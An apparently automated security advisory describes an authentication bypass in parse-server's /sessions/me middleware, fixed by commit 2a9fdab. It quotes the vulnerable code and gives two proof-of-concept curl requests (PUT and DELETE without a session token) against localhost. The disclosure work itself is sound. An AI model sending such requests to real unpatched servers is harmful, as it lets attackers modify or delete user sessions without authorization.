Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 2a9fdab
Author: Manuel
Date: 2026-03-15T18:51:40Z
Commit Message
fix: Validate session in middleware for non-GET requests to `/sessions/me` (#10213)
Pull Request
PR: #10213 - fix: Validate session in middleware for non-GET requests to /sessions/me
Labels: state:released-alpha
Description:
Issue
Validate session in middleware for non-GET requests to /sessions/me
Analysis
Vulnerability Type: Authentication Bypass
Severity: High
Description
Before the patch, non-GET requests to the /sessions/me endpoint bypassed session validation, allowing attackers to perform PUT or DELETE operations without a valid session token. The patch enforces session validation in middleware for these requests, preventing unauthorized session modifications or deletions.
Affected Code
export const handleParseSession = async (req, res, next) => {
  try {
    const info = req.info;
    // Vulnerable branch: any request whose URL is exactly '/sessions/me'
    // skips session validation regardless of HTTP method, so PUT and
    // DELETE reach the session handlers without an authenticated session.
    if (req.auth || req.url === '/sessions/me') {
      next();
      return;
    }
    // ... remainder of the middleware elided in this excerpt
Proof of Concept
curl -X PUT http://localhost:8378/1/sessions/me -H "X-Parse-Application-Id: test" -H "X-Parse-REST-API-Key: rest" -d '{}' # Assuming no session token provided, this request would succeed before patch, allowing unauthorized session update
curl -X DELETE http://localhost:8378/1/sessions/me -H "X-Parse-Application-Id: test" -H "X-Parse-REST-API-Key: rest" # Without session token, this request would succeed before patch, allowing unauthorized session deletion
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-16T00:00:54.875Z